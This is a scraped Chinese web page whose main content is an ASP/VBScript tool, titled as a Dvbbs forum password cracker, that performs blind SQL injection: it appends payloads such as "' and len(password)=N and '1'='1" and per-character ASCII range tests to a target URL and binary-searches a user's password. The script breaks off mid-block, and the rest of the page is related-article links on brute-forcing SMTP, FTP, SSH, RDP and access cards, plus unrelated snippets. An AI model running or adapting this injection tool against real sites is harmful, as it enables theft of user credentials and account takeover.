<% 

response.buffer=false 

'为防止程序陷入死循环,初始化一些最大重试值 

Dim MaxPassLen,MaxPassAsc 

MaxPassLen=20 'password最大长度 

MaxPassAsc=20

'==== 字符转换 

Function bytes2BSTR(vIn) 

strReturn = "" 

For j = 1 To LenB(vIn) 

ThisCharCode = AscB(MidB(vIn,j,1)) 

If ThisCharCode < &H80 Then 

strReturn = strReturn & Chr(ThisCharCode) 

Else 

NextCharCode = AscB(MidB(vIn,j+1,1)) 

strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 

j = j + 1 

End If 

Next 

bytes2BSTR = strReturn 

End Function 

' 以下是取网页内容 ========== 

Function GetUrl(Url) 

set oSend=createobject("Microsoft.XMLHTTP") 

SourceCode = oSend.open ("GET",url,false) 

oSend.send() 

SourceCode = bytes2BSTR(oSend.responseBody) 

GetUrl = SourceCode 

End Function 

'以下是推断返回页面效果 

Function ChkPage(SourceCode,SucKey,ErrKey) 

if Instr(SourceCode,SucKey) > 0 then 

ChkPage=true '页面返回成功 

exit function 

end if 

if Instr(SourceCode,ErrKey) > 0 then 

ChkPage=false '页面出错 

exit function 

end if 

ChkPage=false 'keyword信息不正确或者是页面未连接 

response.write("keyword信息不正确或者是页面未连接") 

response.end 

End Function

'開始破解 

'Dim url,username,password,SucKey,

Dim PassLenUrl 

Dim PassLen 

Dim ChkPassLen

If request("begin")<>"" then 

response.cookies("PassLen")=0 

url=request("url") 

username=request("username") 

password=request("password") 

SucKey=request("SucKey") 

ErrKey=request("ErrKey") 

response.write("第一步。破解password长度<BR>")

PassLen = 1 

ChkPassLen = false 

Do while not ChkPassLen 

PassLenUrl = Url & username & "'%20and%20len(" & password & ")=" & PassLen & "%20and%20'1'='1" 

response.write("当前測试password位数为“" & PassLen & "”。请稍等......<BR>") 

ChkPassLen = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey) 

If ChkPassLen Then 

response.write("成功。!!

password位数已经測试出来了。開始測试详细位数<BR>") 

exit do 

Else 

response.write("不行。继续下一位測试!<BR>") 

End If 

If PassLen > MaxPassLen then 

response.write( "password位数未能測试出,请确认是否有此用户或又一次调整password长度范围") 

response.end 

exit do 

End If 

PassLen = PassLen + 1 

Loop 

response.write ("<FONT COLOR=red>已经測试出password长度为" & PassLen & ",開始測试详细password值</FONT><BR><BR>") 

'循环每一位 

Dim Asc1,Asc2,Asc10,Asc20,Ascstr 

'Dim AscArr(PassLen) 

Dim ChkPass,Asctemp1,Asctemp,count 

Ascstr = ""

For i=1 to PassLen 

ChkPass = false 

Asc1 = 33 

Asc2 = 126 

response.write "開始破解第" & i & "位password<BR>" 

'用二分法取asc码范围 

count=1 

suc=false 

Do while not suc 

Asctemp1=Asctemp 

if (Asc2-Asc1) mod 2 = 1 then 

Asctemp=(Asc2-Asc1-1)/2 

else 

Asctemp=(Asc2-Asc1)/2 

end if

response.write "划定password范围为:" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "<BR>" 

PassLenUrl = Url & username & "'%20and%20asc(mid(password,"&i&",1))>=" & int(Asc1) & "%20and%20asc(mid(password,"&i&",1))<=" & int(Asc2) & "%20and%20'1'='1" 

response.write "划定password范围为:" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "<BR>" 

ChkPass = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey) 

if Asc1 = 33 and Asc2 = 126 and not ChkPass then 

response.write "password不在所设定ASC码范围内" 

%>

动网论坛password暴力破解程序代码的更多相关文章

  1. SMTP暴力破解

    这里实现一个SMTP的暴力破解程序,实验搭建的是postfix服务器,猜解用户名字典(user.txt)和密码字典(password.txt)中匹配的用户名密码对, 程序开发环境是: WinXP VC ...

  2. 暴力破解FTP服务器技术探讨与防范措施

    暴力破解FTP服务器技术探讨与防范措施 随着Internet的发展出现了由于大量傻瓜化黑客工具任何一种黑客攻击手段的门槛都降低了很多但是暴力破解法的工具制作都已经非常容易大家通常会认为暴力破解攻击只是 ...

  3. sshd服务---暴力破解应对策略

    sshd服务暴力破解步骤 sshd暴力破解方法 防止暴力破解调优 1. 变更默认端口 2. 变更root用户 3. 日志监控-->防止暴力破解(fail2ban应用) fail2ban详解 在初 ...

  4. 编写DVWA暴力破解High级别的Python脚本

    1. 过程(不查看源代码) 使用burpsuite或者owasp zap抓取数据包,可以看出页面执行过程如下: 首先获取上一次请求的token,然后sleep几秒,最后使用get方法提交验证. 2. ...

  5. 2-3 sshd服务---暴力破解应对策略

      sshd服务暴力破解步骤 sshd暴力破解方法 防止暴力破解调优 1. 变更默认端口 2. 变更root用户 3. 日志监控-->防止暴力破解(fail2ban应用) fail2ban详解 ...

  6. RDP协议暴力破解

    真实案例|RDP协议暴力破解卷土重来! 作者:aqniu星期六, 七月 2, 20160   背景 RDP(Remote Desktop Protocol)称为“远程桌面登录协议”,即当某台计算机开启 ...

  7. 利用Teensy进行EM410x卡模拟以及暴力破解EM410X类门禁系统可行性猜想

    前些天Open入手了Teensy++2.0模拟EM410X,并且针对EM410X的门禁进行了一次暴力破解测试,以下就是相关代码以及内容. 什么是低频?什么是EM410x? 首先,我不得不再次提一下那些 ...

  8. 利用Teensy进行em410x卡模拟以及暴力破解em410x类门禁系统

    什么是低频?什么是EM410x? 首先,我不得不再次提一下那些工作在125khz频率下的低频卡(如:EM410X之类的),以便大家更好的阅读以下的内容. 什么是低频?以下就是低频的解释: 低频(LF, ...

  9. 用python暴力破解压缩文件并不是万能,至少这个场景我告诉你密码你用代码也破解不了

    看到论坛上各种贴子写用python进行暴力破解的文章,于是自己也想去尝试一下,不试不知道,一试吓一跳,真的就像那句有名的”python由入门到放弃“,把论坛上别人的脚本全部自己敲一遍,运行不报错,但也 ...

随机推荐

  1. 【HDOJ】4729 An Easy Problem for Elfness

    其实是求树上的路径间的数据第K大的题目.果断主席树 + LCA.初始流量是这条路径上的最小值.若a<=b,显然直接为s->t建立pipe可以使流量最优:否则,对[0, 10**4]二分得到 ...

  2. js生成二维码参数设置

    jquery qrcode使用方法 $(selector).qrcode({ width: 100, height: 100, color: '#3a3', text: 'http://larsjun ...

  3. volicety常用方法

    1.volicety得到某个元素的个数 $extendsInfos.size() 2.volicety 布尔值判断: 如果a为null,#if($a) ,产生的判断值是false  等同于#if(fa ...

  4. SCOI2010 and SXOI2014 股票交易(DP)

    明显的单调队列…… 但下面的程序一直有bug 附上题解:http://blog.csdn.net/njlcazl/article/details/8611042 附上我的代码: var head,ta ...

  5. UVA 1349 Optimal Bus Route Design 最优公交路线(最小费用流,拆点)

    题意: 给若干景点,每个景点有若干单向边到达其他景点,要求规划一下公交路线,使得每个景点有车可达,并且每个景点只能有1车经过1次,公车必须走环形回到出发点(出发点走2次).问是否存在这样的线路?若存在 ...

  6. Hibernate4.x之映射关系--多对多

    n-n的关联关系分为以下两类: 1.单向n-n关联关系: n-n的关联必须使用连接表 与1-n映射类似,必须为set集合元素添加key子元素,指定CATEGORIES_ITEMS表中参照CATEGOR ...

  7. 使用CSS3美化复选框checkbox

    我们知道HTML默认的复选框样式十分简陋,而以图片代替复选框的美化方式会给页面表单的处理带来麻烦,那么本文将结合实例带您一起了解一下使用CSS3将复选框checkbox进行样式美化,并且带上超酷的滑动 ...

  8. MYSQL select时锁定记录问题

    在使用SQL时,大都会遇到这样的问题,你Update一条记录时,需要通过Select来检索出其值或条件,然后在通过这个值来执行修改操作. 但当以上操作放到多线程中并发处理时会出现问题:某线程selec ...

  9. API性能测试基本性能指标及要求

    略 适用 Lifeix 所有后台应用. 1.事务(Transaction) 在web性能测试中,一个事务表示一个“从用户发送请求->web server接受到请求,进行处理-> web s ...

  10. 【原】Storm配置

    Storm入门教程 1. Storm基础 Storm Storm主要特点 Storm基本概念 Storm调度器 Storm配置 Guaranteeing Message Processing(消息处理 ...